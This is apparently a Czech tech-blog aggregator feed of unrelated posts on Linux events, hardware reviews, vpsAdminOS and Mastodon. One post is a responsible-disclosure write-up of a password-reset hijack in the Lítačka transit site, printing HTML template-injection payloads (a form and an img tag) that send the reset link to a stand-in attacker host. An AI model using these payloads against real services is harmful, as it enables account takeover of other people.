Relativní změna

Reální uživatelé (RU)

1 653 754

1 638 794

-14 960

-0,90%

Zhlédnuté stránky (PV)

322 079 495

307 082 404

-14 997 091

-4,66%

 

Zdroj: NetMonitor, srpen a září 2018.

Přijďte o víkendu na LinuxDays, my tam budeme

říjen
01
vpsFree.cz

Už tento víkend vyrazíme na LinuxDays. Přivezeme stánek, server, přednášející a parádní nálepky na notebook.

Co děláte o víkendu? My budeme 6. a 7. října na konferenci LinuxDays, která probíhá tradičně na FIT ČVUT v Dejvicích. Těšit se můžete na všechny důležité linuxáky, výborné kafe a samozřejmě náš stánek. Vstup je zdarma, ale nezapomeňte se zaregistrovat.

Letos se opět chystáme přednášet: Pavel Šnajdr bude povídat o vývoji vlastního hardware pro vpsFree.cz, Richard Marko s ním pak představí linuxovou distribuci NixOS, společně pak popíší vývoj virtualizační platformy vpsAdminOS. Petr Krčmář bude přednášet o pojmenování síťových zařízení v Linuxu a synchronizačním nástroji Syncthing. Věroš Kaplan bude povídat o zálohovacím nástroji Restic a Ondřej Caletka zase o správě zónových souborů v Gitu. To je jen část přednášejících, kteří jsou členy vpsFree.cz.

Jako obvykle nás potkáte také na stánku, kde budeme rozdávat čokoládky, ukazovat server a předvádět svou novou virtualizační platformu vpsAdminOS. Především si s námi ale budete moci popovídat nejen o spolku vpsFree.cz a virtualizaci, ale také o dalších linuxových tématech. Můžete si také odnést pěknou hexa nálepku na notebook.

Jak stahovat videa z TV Nova, iVysílání a Prima Play

Pokud byste někdy potřebovali uložit nějaký videostream ze stránek TV Nova, je to poměrně jednoduché. Poslouží nám k tomu opět přehrávač

Příspěvek Jak stahovat videa z TV Nova, iVysílání a Prima Play pochází z Spajk.cz

QRecorder vykrádal bankovní účty

To by jeden od aplikace sloužící k nahrávání hovorů nečekal. Jednalo se o dosti zajímavý útok, se kterým jsem se zatím

Příspěvek QRecorder vykrádal bankovní účty pochází z Spajk.cz

Pozvánka na 156. sraz OpenAlt – Brno

září
21
Openalt.org

Sraz, pokec, pivko, v páte 20. žáří 2018 od 18 hodin v restauraci Na Purkyňce na ulici Purkyňova 80.

Pozvánka na 156. sraz OpenAlt – Praha

září
18
Openalt.org

Zářijový pražský sraz spolku OpenAlt se koná již tento čtvrtek – 20. 9. 2018 od 18:00 v Radegastovně Perón (Stroupežnického 20, Praha 5). Tentokrát bez oficiální přednášky, ale zato s dobrým jídlem a pivem – volná diskuse na téma IoT, CNC, svobodný software, hardware a další hračky.

PLL ADF4351 jako LO

Na eBay nebo Aliexpress je možné koupit velmi levné vývojové desky s PLL od Analog Devices ADF4351. Tento obvod funguje od 35 MHz do 4.4 GHz. Krok je 10 kHz. Deska má 2 výstupy. Maximální výstupní výkon je +5dBm. V základu je deska osazena oscilátorem 25 MHz. Je možné připojit extrerní oscilátor (na desce je třaba odpájet R5 a tím odpojit interní). Toto je vhodné třeba na připojení 10MHz normálu s GPS. Tímto modulem  můžeme velmi lehce realizovat LO pro MW transvertory nebo osobní maják pro testy zařízení. Případně signální generátor pro různá měření.  Navrhl jsem velmi jednoduchou destičku která se přímo nasadí na modul. Obsahuje MCU ATTiny13. Výsledný zdrojový kód je možné zkompilovat pomocí Arduino IDE za pomoci https://github.com/MCUdude/MicroCore a programátoru ISP. Do programu je nutné zadat hodnoty regisrů pro nastavení PLL.  Hodnoty registrů získáme z datasheetu a nebo jednodušeji z SW který je k dispozici na stánkách Analog Devices.


Nastavení registrů v SW.
Zdrojové ḱódy  je možné stáhnout z https://github.com/ok1cdj/ADF4351-basic-LO a stavebnici desky je možné zakoupit na hamshop.cz

Únos resetu hesel na Lítačce

září
14
Michal Spacek

Pár dní po spuštění jsme se na to s Jakubem Boučkem z rychlíku podívali a pár bezpečnostních chyb našli vcelku rychle. Kvůli jedné z nich jde zneužít nepovedený reset zapomenutých hesel k únosu účtů.

Nejdříve ale vlítneme na registraci, protože pro další zkoumání budeme potřebovat účet. Po zadání e-mailové adresy a hesla při registraci je ještě nutné účet aktivovat kliknutím na odkaz, který Lítačka pošle na zadaný e-mail.

Aktivace jakéhokoliv účtu

Obsah aktivačního e-mailu včetně odkazu se ale nejdřív posílá z prohlížeče na server, ten ho vezme a pošle na zadaný e-mail. Pokud chcete ověřit jakýkoliv účet, tak se stačí podívat co váš prohlížeč posílá a vytáhnout si ten správný odkaz.

Registrace začíná odesláním těchto dat z JavaScriptu na https://www.pidlitacka.cz/api:

{
   "params": {
      "UserName": "litacka@...",
      "Password": "...",
      "SendPUK": false
   },
   "action": "CreateLogin"
}
Web Developer nástroje ve Firefoxu

Takhle to vypadá v Developer Tools ve Firefoxu, jiný nástroj nebudeme potřebovat

Server prohlížeči vrátí:

{
   "Result": {
      "ID": 0,
      "Type": {
         "Text": null,
         "ID": 0
      },
      "Text": "OK"
   },
   "Login": {
      "UserName": "litacka@...",
      "LoginID": ...,
      "Active": false
   }
}

Následuje poslání obsahu e-mailu z prohlížeče na https://www.pidlitacka.cz/api, server ho vezme a pošle na zadanou adresu:

{
   "action": "SendEmail",
   "params": {
      "LoginID": ...,
      "TokenID": 1,
      "BodyIsHtml": true,
      "Body": "...HTML... aktivaci Vašeho účtu provedete na následujícím odkazu: <br> <a href=\"https://www.pidlitacka.cz/activation?user=...&id=...\"> ...HTML...",
      "Email": "litacka@...",
      "Subject": "Aktivace účtu"
   }
}

Z vašeho prohlížeče si tedy můžete vytáhnout odkaz https://www.pidlitacka.cz/activation?user=...&id=... pro ověření jakéhokoliv e-mailu. Stačí si otevřít Developer Tools a podívat se na odeslaný požadavek. Zajímavostí je také to, že parametr user v odkazu je do Base64 zakódovaná e-mailová adresa uživatele, jehož účet chcete aktivovat a parametr id je 19 číslic, z nichž prvních 10 nápadně připomíná „timestamp“, tedy počet vteřin od 1.1.1970, častý formát zápisu času.

Jakuba napadlo se podívat na zoubek i resetu hesel. Pokud by prohlížeč stejným způsobem posílal i odkaz na reset zapomenutého hesla, tak by se případný útočník mohl dostat i k tomu odkazu a mohl tak komukoliv unést účet resetováním hesla.

Reset zapomenutých hesel

Reset hesla začíná kontrolou existence uživatelského jména, na https://www.pidlitacka.cz/api se pošlou tato data:

{
   "action": "CheckUserName",
   "params": {
      "UserName": "litacka@..."
   }
}

Po odpovědi ze serveru, která obsahuje mj. "LoginID": ..., prohlížeč sestaví zprávu, která se má uživateli poslat a pošle ji na https://www.pidlitacka.cz/api/requestPasswordChange. Odesílaná data:

{
   "template": "...HTML... {{content}} ...HTML...",
   "root": "https://www.pidlitacka.cz/",
   "params": {
      "email": "litacka@..."
   },
   "type": "password"
}

V prohlížeči se po odeslání objeví „Byl vám odeslán email s odkazem pro změnu hesla“, ale požadavek na nastavení nového hesla obsahuje opravdu jenom {{content}}. Na toto místo server přidá odkaz a nějaký další text a výslednou zprávu pošle na zadaný e-mail. Takže asi smůla.

Dobrý den, na základě Vaší on-line žádosti o změnu hesla Vám zasíláme odkaz, na kterém tuto změnu můžete provést.

Výsledná zpráva s nahrazeným {{content}}

Ledaže bychom si nějak ze stránky vytáhli („exfiltrovali“) to HTML, které Lítačka doplní na místo značky {{content}} a poslali ho k sobě na server. Jo, to by šlo. HTML kolem {{content}} má útočník pod kontrolou, takže tu značku může něčím obalit, třeba formulářem a značkou textarea:

{
   "template": "...HTML... <form action=https://útočník><textarea name=html>{{content}}</textarea><input type=submit value=NASTAV></form> ...HTML...",
   "root": "https://www.pidlitacka.cz/",
   "params": {
      "email": "litacka@..."
   },
   "type": "password"
}

Uživateli přijde e-mail, ve kterém uvidí tlačítko NASTAV, klikne na něj a v tu chvíli prohlížeč vezme obsah útočníkem přidaného textového políčka, do kterého server předtím vložil zprávu včetně unikátního odkazu, a pošle ho na útočníkem zadanou adresu.

Zpráva s tlačítkem NASTAV HESLO

Upravená doručená zpráva, jistě by šla víc vyšperkovat

V logu serveru se pak dá najít něco jako:

GET /?html=...%3Ca+href%3D%22https%3A%2F%2Fwww.pidlitacka.cz%2Fpassword-reset%2Fstep2%3Fid%3D...%22%3E... HTTP/2.0

Po dekódování dostaneme <a href="https://www.pidlitacka.cz/password-reset/step2?id=...">. Stačí ten odkaz vzít, otevřít si ho v prohlížeči a nastavit jakémukoliv uživateli nové heslo a tím mu v podstatě unést účet.

Zapomněli jste heslo? Zde si ho můžete obnovit.

Jednotlivé kroky útoku vypadají následovně:

+-------------+
|  Prohlížeč  | (posílá útočníkem upravenou šablonu a adresu oběti)
+------+------+
       |
<form action=útočník>{{content}}</form>
       |
+------v------+
| Lítačka API | (nahradí {{content}} za odkaz, posílá e-mail)
+------+------+
       |
<form action=útočník>odkaz</form>
       |
+------v------+
|    Oběť     | (uživatel klikne na tlačítko v e-mailu)
+------+------+
       |
odkaz na reset hesla
       |
+------v------+
|   Útočník   | (může nastavit heslo oběti a unést účet)
+-------------+

Únos obrázkem

Uvedený způsob vyžaduje uživatelskou akci – uživatel musí kliknout na tlačítko v e-mailu. Další možností je pokusit se načíst obrázek z útočníkovo serveru:

<img src='https://útočník/?html={{content}}'>

Uživatel si otevře e-mail a jeho prohlížeč narazí na útočníkem vložený obrázek. V tu chvíli se browser pokusí stáhnout obrázek z adresy, do které server doplnil e-mail s unikátním kódem pro reset hesla. Všimněte si ohraničení hodnoty atributu src pomocí apostrofů (někdy jim říkáme jednoduché uvozovky). To je proto, že klasické (dvojité) uvozovky z HTML, které se dosadí místo značky {{content}}, by nám jinak src rozbily a předčasně ukončily.

Takový únos HTML ale nefunguje v Chrome, v něm jsou blokovány požadavky na obrázky s adresou, která obsahuje nové řádky a znak menší než (<). Ve Firefoxu by to prošlo, v logu by se objevilo něco jako:

GET /?html=...%3Ca%20href=%22https://www.pidlitacka.cz/password-reset/step2?id=...%22%3E... HTTP/2.0
Únos odkazu přes obrázek ve Firefoxu

Požadavek na obrázek s uneseným odkazem v Developer Tools ve Firefoxu

Jistě by to šlo celé zkombinovat a automatizovat, ale to není cílem tohoto článku. Jednotlivé kroky vypadají podobně jako v případě použití útočníkem přidaného formuláře, jen uživatel nemusí na nic klikat.

Společně s Jakubem Boučkem vás, webové vývojáře, prosíme, nevěřte ničemu co vám prohlížeč posílá, děkujeme. Rozhodně vám totiž nemusí vrátit to, co mu pošlete. A taky si na web dejte soubor security.txt, ať nemusíme dlouze hledat, komu takové chyby hlásit. Lítačka už takový soubor přidala.

Dodatek

Tak jako vždy jsem po napsání textu výše poslal odkaz dotčené firmě s tím, že ho za týden vydám (chybu jsme už před napsáním článku začali rozebírat veřejně na Facebooku, takže nebyl důvod ho „tajit“ déle). Jejich reakce byla ukázková:

  • 29. srpna 2018 ve 22:41 jsem poslal odkaz na neveřejný článek Michalovi Fišerovi, šéfovi společnosti Operátor ICT, a.s., která Lítačku vytvořila
  • 30. srpna v 0:30 posílám odkaz pro jistotu ještě vedoucímu oddělení vývoje a inovací (máme společného známého, díky Vašku za zprostředkování kontaktu), ten za 13 minut(!) odpovídá a píše „Postarám se, aby se dostal na ty správná místa“, wow!
  • 30. srpna v 7:55 reaguje i Michal Fišer, wow!
  • 30. srpna v 13:02 přichází e-mail od vedoucího oddělení ICT, později odpoledne mi volal, že ještě ten den nasadí opravu, ty jo!
  • 31. srpna ve 13:55 posílám popis chyb, na které mě upozornil Jakub. Jedná se o nesouvisející chybu při pokusu o registraci e-mailu, který obsahuje znak + a o dost vážnější problém, který i po pokusu o opravu stále umožní aktivovat účet někoho jiného: v požadavku z prohlížeče stačí zaměnit e-mailovou adresu oběti za nějakou jinou, na kterou server pošle aktivační odkaz pro uživatele podle loginId, které je také součástí požadavku. Pro správnou funkčnost odkazu je pak potřeba vrátit původní adresu oběti zpět do parametru user.
  • 1. září v 1:11 ještě doplňuji, že reset hesla už podle nás vypadá v pořádku, ale upozorňuji na zřejmou chybu původního API pro posílání aktivačních e-mailů, které jde zneužít pro poslání jakýchkoliv e-mailů na libovolné adresy.
  • Po víkendu, 3. září 2018, 23:08, dostávám odpověď, že nasazují opravy i těch zbylých chyb a že chyba při zadání adresy se znakem + je známá a že prý „bojují s problémem na straně použitého LDAP“. Chápu.
  • V úterý 4. září odpoledne si Operátor ICT telefonicky vyžádal posunutí vydání článku o týden – prý se ta poslední dávka oprav nepovedla podle představ. Původně měl článek vyjít následující den, ale Operátor ICT skvěle reaguje a snaží se, tu hlavní chybu (únos resetu hesel) už opravil, a tak to mile rád vydám později.
  • Po týdnu, 12. září, posílám dotaz, jestli jsou ready. Po pár hodinách dostávám odpověď, že skoro jo a že druhý den bude ještě omezeno zasílání libovolných emailů.
  • Dnes dostávám slíbené vyjádření a konečně mačkám tlačítko „Vydat článek“.

Vyjádření Operátora ICT

„Velice si ceníme profesionálního přístupu p. Špačka a jeho kolegy, kteří nás informovali o potencionální bezpečnostní hrozbě v systému, který je nyní v pilotní fázi. Jsme rádi, že jsme na základě jeho podnětu podnikli okamžité kroky ke zlepšení bezpečnosti regionálního dopravně odbavovacího systému. Právě zpětná vazba od expertů je pro nás velice přínosná a pomáhá nám neustále vylepšovat systém pro bezmála 3 miliony cestujících v rámci Prahy a Středočeského kraje. Díky rychlé a profesionální reakci tak nedošlo k žádnému případu zneužití.“ Vladimír Antonin Bláha, tiskový mluvčí městské společnosti Operátor ICT, a.s.

Díky Jakubovi (@JakubBoucek) za spolupráci a společnosti Operátor ICT za skvělé řešení tohoto incidentu. Kéž by takový přístup měli všichni.

Jak hacknout server přes RDP a jak tomu zabránit

Často slýchám nadávat adminy, jak je možné, že mají zašifrovaný server, i když používají antivirové programy a to i na

Příspěvek Jak hacknout server přes RDP a jak tomu zabránit pochází z Spajk.cz

Zvuková karta Roland Rubix44

Popis

Karta Roland Rubix44 disponuje čtyřmi analogovými vstupy i výstupy (proto 44, existují i varianty 2/2 a 2/4), všechny 192kHz / 24b s vysoce kvalitními DAC a ADC od Ti nebo Burr-Brown (takže stále Texas Instruments). Pojďme si ji ve stručnosti popsat.

Pokud se chcete pokochat tím, co karta skrývá uvnitř, můžete se podívat na skvělý popis s fotografiemi od Franty.

Karta má 4 analogové vstupy v provedení XLR od Neutrik, tedy XLR + 6.35mm jack. Všechny vstupy jsou balancované (je možné zapojit i nebalancovaný vstup).

Každý vstup má samostatné nastavení citlivosti i indikaci přebuzení. Přebuzení je indikováno červenou led na předním a horním šasi přístroje. Správná úroveň signálu je potom indikována zelenou barvou.

Pozn.: Při zapnutí karta postupně problikne všechny kontrolky, takže je možné pořídit snímek zeleně rozsvícených kontrolek úrovně signálu i bez zapojení vstupů.

Pro dvojice vstupů je možné zapnout kompresor nebo limiter. Na výběr jsou dva druhy kompresorů a limiter, pro každou dvojici vstupů je možné mít jiné nastavení. Výběru typu kompresoru je možný na zadní straně přístroje. Na přední straně můžeme kompresor zapnout a nastavit jeho práh. Přebuzení kompresoru je opět indikováno rozsvícením červené led.

Pro dvojice vstupů je možné zapnout fantómové napájení 48V pro kondenzátorové mikrofony. Stejně tak je možné pro dvojici vstupů zapnout vysokou impedanci pro určité typy snímačů.

Všechny zapnuté funkce jsou indikovány oranžovou led kolem příslušných tlačítek.

Výstupy jsou realizovány čtveřicí 6.35mm jack, opět všechny balancované.

Dále je zde výstup na sluchátka, opět standardní 6.35mm jack. Hlasitost sluchátek lze ovládat zcela nezávisle na nastavení hlasitosti výstupu. Na zadní straně přístroje můžeme nastavit, které ze dvou výstupů mají jít do sluchátek.

Výstup do sluchátek nepatří k nejhlasitějším. Mám rád, pokud je zařízení schopno hrát až na práh bolestivosti a mít tak velký prostor mezi poslechovou hlasitostí a maximem. Tady je maximum docela nízko a je nutno použít citlivější sluchátka. Beyerdynamic DT 990 Pro už jsou docela na hraně, Beyerdynamic T70 jsou citlivější a tady je vše v pořádku. Obě jsem testoval v 250Ω variantě. 32Ω sluchátka hrají pochopitelně daleko hlasitěji, ale to se zase nebavíme o HiFi.

Karta tedy poskytuje obrovské množství nastavení a to pro jednotlivé vstupy zvlášť a potom pro dvojice vstupů. Ke dvojici stupů se potom chová (přirozeně), jako ke stereo vstupu nebo výstupu.

Zprovoznění v Linuxu

Zapojte do USB. Rubix funguje out of box a není potřeba nic řešit. Dokonce ani není nic k nastavení, alsamixer je prázdný. Karta nemá žádnou digitálně řízenou regulaci hlasitosti, vše se nastavuje na zvukovce pomocí potenciometrů.

Zprovoznění ve Windows 10

Nepovedlo se mi to. Ačkoliv se jedná o USB Audio Class a nic standardnějšího snad ani neexistuje, tak ve Windows je nutné mít speciální ovladač a to pro každý major update W10 jiný. Nejnovější ovladače z webu Roland v době psaní tohoto článku nefungovaly v poslední verzi Windows 10. Ale Windows neřeším, kartu jsem koupil pro provoz v Linuxu a tady je vše bez problémů.

Nastavení Pulse Audio

Karta funguje bez problémů v PulseAudio, pokud ale chceme vytáhnout maximum (192kHz/24b) je nutné k ní přistupovat přímo jako k Alsa device. To lze snadno udělat tak, že v Pulse Audio Control nastavíme profil off a v konkrétní aplikaci zvolíme Alsa device Rubix44.

Nechci vyvolávat další flame na téma Pulse Audio. Nikdy se mi nepovedlo zprovoznit PA ani na 96kHz pro DragonFly. PA je nejlépe nechat v defaultu na systémové zvuky a vybrané zvukovky používat přímo pomocí Alsa.

V tomto případě mám PA nastaveno na interní zvukovou kartu a ostatní karty jsou v PA vypnuté. To nám umožní používat vybrané karty přímo v konkrétních programech. Např v Audacity:

A hudební přehrávač (více o nastavení DragonFlyDAC v samostatném článku):

Kvalita

Co mě překvapilo a překvapuje mě to pokaždé, když se setkám s highend zvukovým zařízením, je ticho. Ano, ticho. Šum sluchátkového výstupu je tak nízko, že ani na nejvyšší zesílení (bez signálu) neslyším ani nejmenší náznak šumu. Jinak je kvalita dle očekávání zcela excelentní. Přiznám se, že se pokaždé bojím, pokud je něco napájeno ze spínaného zdroje (v tomto případě 9V externího zdroje) nebo z USB, že z napájení bude pronikat rušení do audio signálu. Nic takového. Ani u DragonFly neslyšíte různé zatížení zdroje PC (přenášené přes USB napájení do DACu), ani tady se o šum z napájení netřeba bát.

Nedostatky

Zvukovka má funkci direct monitor, tedy si můžete do výstupů pustit rovnou vstupy. Bylo by ovšem hezké, kdyby byl k disposici přepínač, který by umožnil direct monitor přesměrovat pouze do sluchátkového výstupu a nikoliv do výstupu hlavního. Případně funkci monitor solo, tedy že by do sluchátkového výstupu šel jen konkrétní vstup.

Ano vím, že toto jsou funkce dostupné na mixážním pultu a zvuková karta má zcela jinou roli, ale když už tam je fce direct monitoringu, tak proč tam nedat přepínač jen pro sluchátka.

EDIT: Upřesnění předchozího odstavce. Direct monitor jde vždy na výstup 12 bez ohledu na to, která ze dvojice vstupů (12 nebo 34) se monitoruje. Je tedy možné mít hlavní výstup z karty (třeba do reproduktorů) zapojený na výstup 34, sluchátka mít přepnutá na výstup 12 a pomocí sluchátek monitorovat úrovně vstupů. Tímto vysvětlením tedy předchozí nedostatek odpadá.

Další věcí, která mi chybí, je přepínač direct output. Výstupní hlasitost se ovládá potenciometrem na předním panelu, ocenil bych tlačítko pro linkový výstup a přemostění tohoto potenciometru.

Ale to jsou skutečně jen drobnosti. Potenciometr ovládání výstupů mám na maximum a hlasitost ovládám až na hifi zesilovači.

Klady

Kromě kvality zvuku a bezproblémového zprovoznění v Linuxu bych chtěl především vypíchnout ovládání na samotném přístroji. Všechny často používané funkce jsou dostupné z předního panelu a všechny zapnuté funkce jsou indikované oranžovým světlem kolem příslušných tlačítek. Je vždy na první pohled vidět, co je zapnuté a v jakém je zvukovka nastavení. Indikace síly signálu a přebuzení vstupů nebo kompresorů je potom zcela nepřehlédnutelná.

Závěr

Kartu jsem kupoval zejména kvůli vstupům pro mikrofony a vybral jsem si ji právě pro širokou nabídku nastavení jednotlivých vstupů. Nechci pokaždé vytahovat mixák jen k vůli kompresoru, hledal jsem kompaktnější řešení, které se vejde na stůl a nepřekáží. To se povedlo. Mám k disposici 4 dostatečně nezávislé vstupy, skvělý a čistý sluchátkový výstup a bezproblémový nahrávací audio interface v linuxu s vynikající kvalitou a  vysokým samplerate.

Akční kamera Eken H9R

září
10
Josef Jebavý
Pořídil jsem si akční kameru Eken H9R, která má bez problémů fungovat v Linuxu i jako webkamera, zapojil jsem ji, abych zjistil jak na tom kamera je.....

Profilování SQL dotazů pomocí Netbeans

září
08
Franta Kučera

zdroj perexu

Proč používat filesystém JFS

září
07
Josef Jebavý
Když se mě kolega Martin zeptal: Na blogu pises, ze pouzivas JFS. Mohl bys zhrnout, proc ho pouzivas a jake ma vyhody? JFS nikde nemam, takze me to zajima. Protože......

Nový malý úsporný úžasný DC-DC step-down měnič

září
06
Petr Stehlík
Našel jsem nový snižovač stejnosměrného napětí na AliExpressu a natočil jsem o něm (a vůbec o všech snižovačích napětí) video:


Modul zblízka vypadá takto:
K dostání třeba tady: DC DC Step Down Buck Converter Adjustable 4.5V-24V to 5V 3A 97.5% Power Supply Mini Module 1.8V 2.5V 3.3V 5V 9V 12v For Car

Koupit se dá i v Česku: Mikro nastavitelný zdroj snižující napětí 0,8-17V vysoká účinnost

Už kdysi jsem tu psal o měničích - v roce 2013 Přenosné napájení pro Arduino (DC step-down) a v roce 2014 Velký test DC step-down konvertorů, tak toto video je vlastně takové malé pokračování.

EDIT hned další den ráno:

Doplňuji užitečné informace z komentářů pod mým Google+ příspěvkem. Za prvé, na modulu je nejspíš použit starší čip (či jeho mladá čínská kopie) TPS54332 od Texas Instruments (jeho obdobou by měl být MP2315 od Monolithic Power).

Dále, převládající názor v komentářích je, že se nejedná o chybu chirurga při navrhování plošného spoje, ale že to byl krutý záměr, a že měděnou cestičku je potřeba přeříznout, pokud člověk nechce používat trimr. Pokusil jsem se o to skalpelem, a vyfotil modul před a po operaci:



Jak se praví ve známé písni "už to funguje, konev šetří vodou", takže kdo máte skalpel a chuť něco nebo někoho přeříznout, směle do toho :-)


vpsAdminOS: instalace, aktualizace, nasazení a síťování

září
03
vpsFree.cz

Během prázdnin jsme pracovali na spoustě zajímavých věcí, které bychom vám chtěli ukázat.

I když je vpsAdminOS primárně live systém, občas se hodí možnost nainstalovat systém na disk, např. když ho chcete provozovat na jednom serveru a nemáte PXE. Instalace probíhá stejně jako byste instalovali NixOS: naformátujete disky, vygenerujete config, upravíte ho a spustíte instalační program, viz dokumentace. Jako zavaděč je podporován grub a snadno lze integrovat i SSH v initrd pro odemykání šifrovaných disků, stejně jako v NixOS.

Pro aktualizování běžícího nebo nainstalovaného systému jsme připravili dva nástroje: os-rebuild (ala nixos-rebuild) a nixops (fork, který přidává podporu pro vpsAdminOS). os-rebuild se dá použít přímo z nainstalovaného systému, ale dá se tím aktualizovat i jiný stroj přes SSH. nixops pak řeší správu větší sítě serverů, asi něco jako terraform+ansible v jednom pro NixOS. S naší verzí nixops je možné spravovat v jedné síti NixOS i vpsAdminOS stroje.

Pro migraci dat při aktualizaci OS jsme vytvořili nástroj zvaný osup. vpsAdminOS se při aktualizaci „přeplácne“ novou verzí a níc víc se řešit nemusí, nicméně o konfiguraci a data kontejnerů na ZFS poolech je nutné se starat. Ne vše se podaří dobře navrhnout hned na začátku a změny mohou vyžadovat reorganizaci datasetů, adresářů, atd. Nástroj osup umožňuje takové změny provádět automatizovaně, spouští se spolu s aktualizací systému, ať už přes os-rebuild nebo nixops. Změny provádějí migrační skripty, kterými se pool buď aktualizuje na vyšší verzi, nebo se vrátí na verzi starší.

Už jsem se tu zmiňoval o nutnosti předělat správu IP adres ve vpsAdminu, OS už teď k tomu umí vše potřebné. K síťovým rozhraním VPS se nyní dají zvlášť přidělovat routované adresy a adresy přiřazené na rozhraní, ala ip addr/route add. Takže je např. možné routovat síť /64 a na rozhraní přidělit jen vybrané adresy z dané sítě. Spojovací adresy nadále nebudou muset být na prvním místě, což komplikovalo nastavení sítě v dockeru a obecně maškarádu. Integrace do vpsAdminu je rozdělaná, ale je to poměrně složité a ještě to bude chvíli trvat.

IAB Europe vydala White Paper k header bidding a dynamice aukcí v programaticky obchodované reklamě

IAB Europe vydala White Paper k header bidding a dynamice aukcí v programaticky obchodované reklamě tereza.tumova@… Pá, 08/31/2018 - 11:19

Způsob, jakým se programaticky obchoduje reklama se rychle vyvíjí a nabízí různé mechanismy jako otevřenou aukci, garantovanou aukci a private deal. Jednou z klíčových změn v programatickém obchodování je header bidding, který ovlivnil způsob, jakým se reklamní prostor nakupuje a prodává a tím i dynamiku aukcí.
 
White paper IAB Europe popisuje základy toho, co header bidding je a jak funguje, jeho vývoj, výzvy a příležitosti pro zúčastněné strany na straně nákupu a prodeje. Poskytuje také podklady pro posouzení hlavních aspektů a dopadů při implementování strategie header bidding pro strany nákupu a prodeje.
 
White paper je ke stažení zde.

Objevuju Mastodon

Začátkem roku jsem psal, že jsem se stáhl z Facebooku, Google+ je dneska město duchů, tak se pohybuji především na Twitteru. Posledních pár týdnů ale objevuji jeho otevřenou a decentralizovanou alternativu – Mastodon. Jaký je?

223px-mastodon_logotype_28simple29-svg

Sociální sítě jsou fenoménem poslední dekády Internetu. Používají je miliardy lidí, vyrostly na nich globální korporace. Není divu, že vybízely k vytváření otevřených a nezávislých alternativ. Zatím ale bez většího úspěchu.

Takovou první otevřenou alternativou byla identi.ca a nedá se říct, že by byla úplně neúspěšná. Přišla krátce po Twitteru, rychle naakumulovala uživatelskou základnu v řádu milionů a minimálně v open-source komunitě byla relativně populární. Časem se úplně vytratila. Přešla ze StatusNet na Pump.io a dneska člověk na první pohled ani netuší, jestli to je fungující služba nebo WIP.

Velké haló svého času způsobila Diaspora jako alternativa k Facebooku. Před lety jsem si tam vytvořil účet, ale téměř nikoho tam nenašel. Když jsem se ze zajímavosti připojil nedávno, nebyl tam vůbec nikdo. Růst její uživatelské základy se zastavil ve stovkách tisích uživatelů, což je z globálního pohledu nic.

Standard StatusNet si po konci identi.ca žil dál svým životem a dal vzniknout GNU Social, což je decentralizovaná sociální síť taktéž bez větší uživatelské základny. Až v roce 2016 se objevil Mastodon, který si dal za cíl vytvořit vlastní síť instancí (komunit), ale skrze OStatus (nynější StatusNet) a ActivityPub být kompatibilní i s ostatními sítěmi (GNU Social, Pump.io…).

Vzhledem k tomu, že Mastodon je decentralizovaná síť, musíte si najít instanci, kde si budete chtít vytvořit účet. Já jsem si ten svůj vytvořil už před rokem, když jsem Mastodon jenom zběžně vyzkoušel. Vybral jsem si k tomu mastodon.cloud, který mi byl tenkrát doporučený a u kterého jsem zůstal i po návratu, protože pořád patří mezi instance s nejvíce uživateli. Nicméně dnes je zdaleka nejpopulárnější mastodon.social, který je provozovaný přímo tvůrci Mastodonu.

Instance jsou spíše o komunitách. Každá si může stanovit vlastní pravidla toho, co můžou uživatelé zveřejňovat. Jejich uživatelé se tak nemusí spoléhat na globálně nastavená pravidla a jejich vynucování, jako je tomu u Facebooku nebo Twitteru, ale prostě si vybrat komunitu, která jim vyhovuje nejvíc (od regulovaných až po ty, kde je možné zveřejňovat cokoliv). Samozřejmě vždy je možné sledovat a komunikovat s lidmi z ostatních instancí. Existuje i webová služba, která vám pomůže vybrat tu nejlepší instanci pro vás. Existuje i hosting, kde můžete mít vlastní instanci jako službu.

A jaký Mastodon je? Byl jsem docela překvapený, že to není takové město duchů jako otevřené sociální sítě před ním. Má násobně víc uživatelů než Diaspora a řekl bych, že vyrovnal úspěšnost Identi.ca (svého času). Samozřejmě proti Twitteru je to pořád niché. Uživatelská základna se skládá především z lidí, kteří hledají nezávislou alternativu k Twitteru nebo se zajímají o otevřené technologie. V této oblasti je Mastodon zajímavá síť.

Na Twitteru jsem za tři roky aktivního používání naakumuloval přes 600 sledujících, na Mastodonu jich mám za pár týdnů 20. Nicméně zatím mi přijdou v průměru výrazně aktivnější než sledující na Twitteru. Navíc jsou tam i zajímavé účty na sledování (KDE, GNOME, Baby Wogue, Nextcloud, řada open-source vývojářů). Popravdě ale nevím, kolik z toho je unikátní obsah. Nakonec i já funguju v režimu, že vše, co dávám na Mastodon, dám i na Twitter.

Co se týče používání z pohledu uživatele, tak ten, kdo zná Twitter, se zorientuje i na Mastodonu. Uživatelská jména jsou doplněná o server, kde jsou registrovaná, takže já mám @sesivany@mastodon.cloud. Timeline je přehlednější v tom, že nabízí chronologicky jenom to, co chcete sledovat. Nesnaží se vám inteligentně měnit pořadí nebo nabízet další tweety jako Twitter. UX webového rozhraní ani aplikací (používám Mastalab) není na úrovni Twitteru, není to takový rozdíl, aby si člověk řekl, že je nepřívětivé nebo se něco dělá komplikovaně. Navíc se vytváří nativní desktopový klient pro Linux, takže potom, co Twitter zařízl staré API a díky tomu i aplikace jako Corebird, bude Mastodon možná jedinou sociální sítí s nativním klientem pro Linux.

mastodon_desktop_web_screenshotWebové rozhraní Mastodonu

Trošku nešťastné mi přijde názvosloví. Už název Mastodon je takový všelijaký. Ale „toot“ místo „tweet“ mi přijde vyloženě zvláštní 🙂 Kdo nemá rád srdíčka na Twitteru, ocení, že Mastodon má pořád „favourite“.

Od Mastodonu jsem očekával město duchů a zatím jsem pozitivně překvapený. Twitter i nadále zůstává mojí primární sociální sítí, ale Mastodon beru jako zajímavý doplněk, zvlášť, když pomalu umírá Google+. Jsem zvědavý, jak se bude vyvíjet. Jestli si najde místo jako nezávislá alternativa k Twitteru nebo Facebooku, nebo skončí jako pokusy před ním.

Opravujeme chyby v softwaru: inotify-tools

V pátek jsem narazil na chybu v programu inotifywait a dneska jsem ji ze zvědavosti trochu prozkoumal. Program za určitých okolností padal (SIGSEGV, core dump). Jedná se o celkem banální chybu, kterých je všude plno, a rád bych na ní ukázal, jak v takovém případě můžeme postupovat.

string = csv

The Things Network – LoRaWAN – IoT

